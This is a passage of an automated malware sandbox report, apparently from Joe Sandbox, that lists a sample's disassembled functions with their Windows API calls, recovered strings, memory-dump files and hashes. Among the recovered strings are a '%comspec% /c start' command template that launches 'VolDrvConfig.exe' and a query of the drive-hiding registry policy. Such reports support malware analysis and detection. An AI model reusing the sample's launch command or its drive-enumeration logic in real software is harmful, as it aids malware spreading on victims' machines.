                                              • Opcode ID: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction ID: 3caee3762cbdbcce4f49fb41099d7db393733e6e5b5fc44a0020794708857aa0
                                              • Opcode Fuzzy Hash: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction Fuzzy Hash: 51313D74A40308EBEB10DBA4CC4ABAFB774EB44704F208569E601772D0D7B96A81CF99
                                              Function 00406000 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,00000000,0040BE82,006A0266,?,0040BE9E,00000000,0040D17C,?), ref: 0040600F
                                              • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                              • CreateFileW.KERNEL32(00417708,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                              • LeaveCriticalSection.KERNEL32(004174D8,?,?,?,?,?,?,0040BE9E,00000000,0040D17C,?), ref: 00406248
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                              • String ID:
                                              • API String ID: 1457358591-0
                                              • Opcode ID: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction ID: d2a8f2c597d4f808d2c136561af7b6c80c21d69a530c7dbbc8373d1e9f004416
                                              • Opcode Fuzzy Hash: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction Fuzzy Hash: 6071E0B4E042099BCB04CF98D981FEFBBB1BB48304F14816DE505BB382D779A951CBA5
                                              Function 0040E670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction ID: 498a00270a4ac3f3e732f182914c0c13a71c1caacf2de73c52121c1bdff13e9d
                                              • Opcode Fuzzy Hash: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction Fuzzy Hash: D5412E74A0020AEFDB04DF95C884FAFB7B9BF48304F108969E515A7390D778AE85CB95
                                              Function 0040E7D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction ID: f37cc5fa491f806f20af1ba12fe7b13e6bb3fdd54c67fa744f8c06207b50935d
                                              • Opcode Fuzzy Hash: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction Fuzzy Hash: D1412DB5A0020ADFCB14DF99C884BAFB7B9BF48304F108569E515B7390D778AE85CB94
                                              Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 5e75d3bdf23019904cb63c7272498dca16bbf89365b4ea4552ce7bb9462c7b35
                                              • Instruction ID: 6ff3262b9ae864165baf17eb68ae52fc582ecffe48c2a7281556c95dbf3b24cf
                                              • Opcode Fuzzy Hash: 5e75d3bdf23019904cb63c7272498dca16bbf89365b4ea4552ce7bb9462c7b35
                                              • Instruction Fuzzy Hash: 8C31E172200215ABC710AFB5ED8CAD7B7A8FF54324F00463EF55AD3280DB79A8448B99
                                              Function 00406400 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040640B
                                              • CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
                                              • wsprintfW.USER32 ref: 00406456
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInitializeInstancewsprintf
                                              • String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
                                              • API String ID: 2038452267-1238916929
                                              • Opcode ID: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction ID: 7d2455aabe9eb384640674d95cb3f7402ea72c7f03b095a020dcafb7bbec31f6
                                              • Opcode Fuzzy Hash: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction Fuzzy Hash: 8E31C975A40208EFCB04DF98D885EDEB7B5EF88704F108199F519A73A5CA74AE81CB54
                                              Function 0040E811 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction ID: 0db10e415d6a1e8faee94fa1aa357f29b7cea0d9451b7bd8199af60d13ceb70c
                                              • Opcode Fuzzy Hash: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction Fuzzy Hash: 98312AB5E0020ADFCB14DF99D884BAFB7B5BF88304F108569E514B7390D778AA81CB94
                                              Function 0040E6B1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction ID: f860d819dcfac7245c0065b1f48ab1f28a181454cf029f87bdd60df825f867a0
                                              • Opcode Fuzzy Hash: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction Fuzzy Hash: B9311D74A0020A9FCB04CF99D884FEFB7B5BF88304F148969E514B7390D778AA85CB95
                                              Function 004073B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                              • String ID: %s%s
                                              • API String ID: 1447977647-3252725368
                                              • Opcode ID: b3aa12a9ac6c1bea71ad27052cd7355f0876685bd87c0f59df55197cdbb1ba38
                                              • Instruction ID: 945b1e68ff25bd35ce4625b60af53a64f9c21a9b46b3aa14aa85a39d9b5f9782
                                              • Opcode Fuzzy Hash: b3aa12a9ac6c1bea71ad27052cd7355f0876685bd87c0f59df55197cdbb1ba38
                                              • Instruction Fuzzy Hash: 5D310DB4C00218EFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                              Function 00406340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00406346
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                              • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                              • NoDrives, xrefs: 004063B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                              • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                              Function 0040D6F0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D7E0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D820
                                                • Part of subcall function 0040D7E0: CloseHandle.KERNEL32(?), ref: 0040D839
                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2251373460-0
                                              • Opcode ID: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction ID: 832ae4800ebcb00f90e7428fbbdd4da527039cf188cbed956f615c5464689476
                                              • Opcode Fuzzy Hash: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction Fuzzy Hash: 2C31F874A00208EFDB04DF94D889F9EBBB5FB49304F0085A9E905A7390D775AA95CF54
                                              Function 00409440 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction ID: c7f26e6fe3f6e47823c68d9e93f939c843ab0f3ebbce24f5146439a699fa7f9b
                                              • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction Fuzzy Hash: CC114F326005186B8B10EF9EC44269ABBD6EF84360B15C136FC2CCF319D634D9414BD4
                                              Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                              • htons.WS2_32(?), ref: 00401281
                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                              • String ID: pdu
                                              • API String ID: 2164660128-2320407122
                                              • Opcode ID: 8ae6570444e5f91760108b530f1a08cb32bd2fc07e3f7a4ef94bae8ae05db212
                                              • Instruction ID: 395797021da18ac5dc0c4ab187d218299f1ec32cbdde21a351b7e81b9c40248d
                                              • Opcode Fuzzy Hash: 8ae6570444e5f91760108b530f1a08cb32bd2fc07e3f7a4ef94bae8ae05db212
                                              • Instruction Fuzzy Hash: E83180762083009BC710DF69D884A9BBBF4AFC9714F04456EFD9897381D634D91587AB
                                              Function 00406F70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,00407FB7), ref: 00406F78
                                              • SysAllocString.OLEAUT32(C:\Users\user\Desktop\file.exe), ref: 00406F83
                                              • CoUninitialize.OLE32 ref: 00406FA8
                                                • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                              Strings
                                              • C:\Users\user\Desktop\file.exe, xrefs: 00406F7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$Free$AllocInitializeUninitialize
                                              • String ID: C:\Users\user\Desktop\file.exe
                                              • API String ID: 459949847-1957095476
                                              • Opcode ID: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction ID: 7397cee9579370c29f446d7a93da1be4fc5365a48f81cc5ba3db23e82f7acdfe
                                              • Opcode Fuzzy Hash: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction Fuzzy Hash: 22E0D8B4940308FBCB00DBE0ED0EB8D7734EB04315F004074F90267291DAB95E80C755
                                              Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                              • String ID:
                                              • API String ID: 3966618661-0
                                              • Opcode ID: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction ID: 36d18bb318df5a029dedd03b2acd005dba350197efc47ce95ae0e9b03ff24c88
                                              • Opcode Fuzzy Hash: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction Fuzzy Hash: 7241A175604A01ABC714EB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                              Function 0040B110 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00417D28,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B1A8
                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B1C9
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B1D3
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B1DD
                                              • InterlockedExchange.KERNEL32(00416900,0000003D), ref: 0040B1EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                              • String ID:
                                              • API String ID: 442028454-0
                                              • Opcode ID: a0a4e6ae3ed30183f399e8ba9aee31b57bdf5208d54d0e8c38c9924f8c3679e4
                                              • Instruction ID: c603907199676edbd5c7d0fa982afae34b74f891853afe3642d2180ffa8dca70
                                              • Opcode Fuzzy Hash: a0a4e6ae3ed30183f399e8ba9aee31b57bdf5208d54d0e8c38c9924f8c3679e4
                                              • Instruction Fuzzy Hash: 8D313EB4A40209EBCB14DF94EC85FAEB7B4FB48300F20C569E515673D0D774AA41DB99
                                              Function 00409020 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl
                                              • String ID:
                                              • API String ID: 435966717-0
                                              • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction ID: 6393123168de4f4826dca7712cb04f948d5e4027293efa58ed578d500b7b4a08
                                              • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction Fuzzy Hash: DDF03172901428AB9750EEFF84424CBF7E6AF9C368B219176FC18E3260E9709D0546F2
                                              Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                                • Part of subcall function 0040A740: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
